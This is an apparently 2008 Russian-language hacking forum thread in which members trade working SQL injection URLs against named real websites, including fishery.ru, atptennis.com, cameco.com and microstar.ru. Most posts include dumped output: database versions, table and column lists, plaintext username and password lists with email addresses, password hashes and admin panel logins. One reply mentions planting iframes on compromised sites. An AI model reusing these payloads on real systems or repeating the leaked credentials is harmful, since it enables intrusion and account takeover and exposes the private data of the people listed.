SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Климент_Ворошилов

    Joined:
    8 Dec 2007
    Messages:
    21
    Likes Received:
    10
    Reputations:
    0
    Code:
    _http://www.fishery.ru/
    _http://www.fishery.ru/news/index.php?id=11687#11687
    _http://www.fishery.ru/news/index.php?id=11687%27#11687
    _http://www.fishery.ru/news/index.php?id=11687+order+by+7/*#11687
    _http://www.fishery.ru/news/index.php?id=-11687+union+select+1,2,3,4,5,6,7/*#11687
    _http://www.fishery.ru/news/index.php?id=11687+union+select+1,database(),user(),4,5,version(),7/*#11687
    
    database - fishery
    user - fishery@localhost
    version - 5.0.45-community-log
    
    23:catalogcontent
    23:--1:user
    23:--2:pswd
    23:--3:companyname
    23:--4:postaddress
    23:--5:address
    23:--6:phone
    23:--7:fax
    23:--8:city
    23:--9:email
    23:--10:namedomain
    23:--11:contactname
    23:--12:comment
    23:--13:file1
    23:--14:file2
    23:--15:url
    23:--16:file3
    23:--17:file1name
    23:--18:file2name
    23:--19:file3name
    23:--20:file1desc
    23:--21:file2desc
    23:--22:file3desc
    23:--23:file1date
    23:--24:file2date
    23:--25:file3date
    23:--26:file1size
    23:--27:file2size
    23:--28:file3size
    23:--29:file1count
    23:--30:file2count
    23:--31:file3count
    23:--32:viewcat
    23:--33:viewsite
    23:--34:uid
    23:--35:subscribe
    23:--36:created
    23:--37:money_amount
    23:--38:enabled
    
    
    26:forums_auth
    26:--1:sess_id
    26:--2:name
    26:--3:username
    26:--4:password
    26:--5:email
    26:--6:webpage
    26:--7:image
    26:--8:icq
    26:--9:aol
    26:--10:yahoo
    26:--11:msn
    26:--12:jabber
    26:--13:signature
    
    первая десятка:
    fish:death:[email protected]
    lopantsev:uhzpyjd:[email protected]
    континент:континент:[email protected]
    bioacoustik:123321:[email protected]
    Vostok Trust:astra57126:[email protected]
    olecia:fortuna:[email protected]
    sakhtot:bihkek:[email protected]
    0000y:00000:[email protected]
    norvik:77777:[email protected]
    present:dasha:[email protected]
    
    первая 10 с форума.
    
    mnt:542034e38fc03450534f2400649c6ba8
    fishmonger:2e8d6dbf9112a879d4ceb15403d10a78
    msk.omsk:60bdd6c1e11766886e1275dccec940b8
    iv_mihailov:a82d922b133be19c1171534e6594f754
    hantrade:0004d0b59e19461ff126e3a08a814c33
    tarakan:adb97c291e3725d0f1a76cd2c6c14673
    flimpy:fa112890762d8ed70e46ee42b11b55f1
    red:827ccb0eea8a706c4c34a16891f84e7b
    bruja:6bfb02b76ad8bed2bec95a2282c9cae6
    dinamit:48bde11a4f202709aaad3e58f24d71eb
    
     
    1 person likes this.
  2. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    вроде, не баян.
     
  3. lexa007

    lexa007 Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    71
    Likes Received:
    24
    Reputations:
    -5
    HTML:
      http://www.satdv.net.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://www.aloris.ru/http://www.tatshop.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://kneparhia.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://support.gateway.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://glasstable.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
       
     
  4. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    http://www.usms.org/articles/articledisplay.php?a=-150'+union+select+1,2,3,4,5,6,7,8,9/*
    name=usms_main
    dbver=5.0.27-standard
    [email protected]
    таблы так и не осилил :)
     
  5. ZipaCna

    ZipaCna Elder - Старейшина

    Joined:
    29 Feb 2008
    Messages:
    60
    Likes Received:
    15
    Reputations:
    3
    Мой первый скуль в топике:

    http://www.speedguide.net/read_articles.php?id=-174+union+select+1,2,concat(user,password),4,5+from+mysql.user--
     
    1 person likes this.
  6. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    ЦЕЛЬ:
    Code:
    http://www.fnm.msu.ru
    УЯЗВИМОСТЬ:
    Code:
    BLIND SQL INJ
    ГДЕ:
    Code:
    http://www.fnm.msu.ru/main.php?topic=1 and 1=1
    ЭКРАНИРОВАНИЕ СПЕЦСИМВОЛОВ:
    Code:
    ДА
    ВЕРСИЯ MySQL:
    Code:
    5.0.24a-Debian_9-log
    НАЛИЧИЕ INFORMATION_SCHEMA:
    Code:
    ДА
    ТАБЛИЦЫ:
    Code:
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    doc_folders
    documents
    indexim
    sessions
    subtopics
    topics
    users
    А дальше - сами=)
     
    2 people like this.
  7. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    не баян :)
     
  8. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+null,version(),null,4,null,null,null,null,null,null,null,null,null,null,null,null,null,null--

    PostgreSQL 7.4.7 on i386-portbld-freebsd5.3, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+--

    выводит много интересного, но я выбрал pg_user

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+null,COLUMN_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+information_schema.columns+where+table_name=(select+TABLE_NAME+from+information_schema.tables+limit+1+offset+43)--

    результат:

    usecatupd
    usesuper
    usecreatedb
    usename
    usesysid
    passwd
    valuntil
    useconfig

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user--

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+null,passwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user--


    первый это админ
    login: postgres
    pass: ********

    Так вот вопрос по существу как пароли то вытащить, я пробовал даже тип поля помнять с hide что-то не могу... разьве что e-mail сменить и воспользоваться воостановлением пароля....
     
    1 person likes this.
  9. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    www.tungus.ru

    Code:
    http://www.tungus.ru/views.php?id=791000+union+select+1,2,3,concat_ws(0x3a,user,pass),5,6,7,8+from+users/*
    бугага, смотрим в свойтва рисунка
    nitros911:ujkfz;jgf голаяжопа :D
    идем в админку
    http://www.tungus.ru/admin.php правильно, и админим

    куча обоев для рабочего стола скачать 250 мб
     
    2 people like this.
  10. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.kalm.ru/ru/docs_view.php?id=-1+union+select+1,2,3,4,concat(version(),char(58),database(),char(58),user()),6,7,8+--

    4.0.16-log
    kalm_ru
    kalm@localhost
     
  11. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    VERSION: 4.1.20
    DATABASE: iwdp
    USER: iwdp@localhost


    VERSION: 5.0.24a-log
    DATABASE: d60350056
    USER: u70382875@cgihost
     
    2 people like this.
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 cash$$$
    Два баяна
    _http://forum.antichat.ru/showpost.php?p=594249&postcount=981
    _http://forum.antichat.ru/showpost.php?p=577278&postcount=4680
     
  13. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    рейтинг игроков в теннис
    Code:
    http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'

    перебераем таблы

    Code:
    http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('plyrbioHTML','ContestInfo_bak','rankdates','SQLINJECTION','rankmast','RollingRank','sglbest14','PlayerEquip','sglbest14roll','sglmtchfact','PlayerEquip_backup','ClipBTournEntryPossibles','cntrymast','cntrymast_Latino','ContestInfo','dblbest14','dblbest14roll','dblno1plyr','dblrndrsl','dblrndrslXX','dbltrnrsl','dbltrnrslroll','dblwinstreak','dtproperties','DW_EventHistoryByTrnYearTrnNum','DW_SglRaceRankByCountry','emailtemp','ENTY_PlayerProperty'))
    все лень было перебирать
    Code:
    plyrbioHTML',
    'ContestInfo_bak',
    'rankdates'
    ,'SQLINJECTION',
    'rankmast','RollingRank',
    'sglbest14','PlayerEquip',
    'sglbest14roll','sglmtchfact',
    'PlayerEquip_backup',
    'ClipBTournEntryPossibles',
    'cntrymast','cntrymast_Latino',
    'ContestInfo',
    'dblbest14',
    'dblbest14roll',
    'dblno1plyr','dblrndrsl',
    'dblrndrslXX'
    ,'dbltrnrsl','dbltrnrslroll',
    'dblwinstreak',
    'dtproperties','DW_EventHistoryByTrnYearTrnNum',
    'DW_SglRaceRankByCountry'
    ,'emailtemp'
    ,'ENTY_PlayerProperty
    
    берем таблицу перебираем столбцы для примера plyrbioHTML
    Code:
    http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='plyrbioHTML'AND+COLUMN_NAME+NOT+IN+('plyrnum','lastupdate','updateind','biotext'))--
    находим нужный столец выводим напр plyrnum
    Code:
    http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=1'+or+1=(SELECT+TOP+1+plyrnum+FROM+plyrbioHTML)--
    получаем 'A001'
    Куму нужно ишите админку просто честно лень было :D

    P.s там же в строке поиска фотографий Иньекция через POST параметр коу как удобней :)
     
    #5033 MaSter GeN, 10 Mar 2008
    Last edited: 10 Mar 2008
  14. nex0

    nex0 Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    52
    Likes Received:
    83
    Reputations:
    6
    microstar.ru :)

    Code:
    http://www.microstar.ru/program/support/download/dld/spt_dld_detail.php?UID=459888+union+select+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18&kind=10
    version() 5.0.37-log
    user() microsta@localhost
    database() msi
    Code:
    http://www.microstar.ru/program/support/download/dld/spt_dld_detail.php?UID=459888+union+select+concat(user,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users
    Выбираете какая именно из админок вам нужна)
    Code:
    http://microstar.ru/ssl/
    к MSI WWW Admin admin:vscegths

    dailygrill.com
    Code:
    http://www.dailygrill.com/details.php?loid=999+union+select+1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,user(),0x3a,database()),12,13,14,15,16,17,18/*
    version() 4.1.20
    user() dailgrill@localhost
    database() dailygrill

    www.cameco.com
    Code:
    http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7
    version() 4.0.24-log
    user() webuser@localhost
    database() cameco
    Code:
    http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(user,0x3a,password),5,6,7+from+mysql.user
    Code:
    root:38d08178573a7e9a
    webuser:
    ripple:094af26d30f261b0
    twc:6657738010cb81dd
    riona_ca:63c907421a792a43
    Code:
    http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(user_name,0x3a,user_password),5,6,7+from+users+limit+0,1
    admin:1112ff600dee3a15 - chicago
     
    #5034 nex0, 10 Mar 2008
    Last edited: 10 Mar 2008
    2 people like this.
  15. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    VERSION: 5.0.41--log
    USER: [email protected]
    DATABASE: fantasiasexshop1

    VERSION: 4.1.22-standard
    USER: williamt@localhost
    DATABASE: williamt_wtdb

    admin_module
    admin_user_levels
    admin_user_module
    homepage
    magazine
    users
    yarn
     
    2 people like this.
  16. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    http://www.rhd.uz/forum_cont.php?uid=-99999+union+select+1,2,user(),version(),database()/*

    USER: [email protected]
    VERSION: log 5.0.45
    DATABASE: atumatu_rhd
     
    1 person likes this.
  17. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    www.tourtasmania.com PR4

    Code:
    http://tourtasmania.com/content.php?id=cygnet'+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,database(),version(),user()),7/*
    justin_tourtas:4.1.20:justin_ttweb@localhost
    стандартных таблиц нет

    www.alkamae.com PR3
    Code:
    http://www.alkamae.com/product.php?id=8500000+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,6,14,18,19,20,21,22+from+users+limit+0,1/*
    5.0.45-community:alkamae_content:alkamae_admin121@localhost
    Code:
    http://www.alkamae.com/product.php?id=8500000+union+select+1,concat_ws(0x3a,NAME,password,member_level),3,4,5,6,7,8,9,10,11,12,13,14,15,6,14,18,19,20,21,22+from+users+limit+0,1/*
    HEATHER:test:4
    но в админку это не канает(
     
    2 people like this.
  18. je0n

    je0n Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    345
    Likes Received:
    96
    Reputations:
    41
    http://www.takayagolfcentre.com/
    Code:
    http://www.takayagolfcentre.com/gallery.php?album=3&image=-4+union+select+11111,concat_ws(0x3a,username,password)+from+users/*
    (вывод в src картинки)
    http://www.takayagolfcentre.com/admin/
    admin:takaya07

    avtorinok.ru
    (есть в антибояне, но у меня с админскими правами для форума)
    Code:
    http://www.avtorinok.ru/news/news_firms.php?id=-890+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.avtorinok.ru/forum/
    Andrey:welcome22
     
    1 person likes this.
  19. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    je0n
    вот только то ифреймы на взломаные сайты ставить не надо что бы античатовцы вирусы хватали
     
  20. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    жопс)
    Code:
    [B][SIZE=2]http://ldpr.ru/iframe.php?page=bzone_banners&pid=-1+union+select+1,1,3,1,1+from+information_schema.tables/*&content_id=1[/SIZE][/B]
     
    4 people like this.
Thread Status:
Not open for further replies.